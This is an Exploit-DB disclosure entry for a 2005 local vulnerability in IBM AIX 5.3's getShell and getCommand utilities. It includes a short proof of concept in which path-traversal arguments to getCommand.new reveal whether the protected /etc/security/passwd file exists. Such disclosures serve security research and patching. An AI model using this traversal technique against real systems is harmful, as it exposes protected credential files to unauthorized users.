IBM AIX 5.3 - 'GetShell' / 'GetCommand' File Enumeration

EDB-ID:

26996


Author:

xfocus

Type:

local


Platform:

AIX

Date:

2005-12-30


source: https://www.securityfocus.com/bid/16102/info

IBM AIX is prone to a local vulnerability in getShell and getCommand. This issue may let local attackers enumerate the existence of files on the computer that they wouldn't ordinarily be able to see.

-bash-3.00$./getCommand.new ../../../../../../etc/security/passwd
-bash-3.00$./getCommand.new ../../../../../../etc/security/passwd.aa
fopen: No such file or directory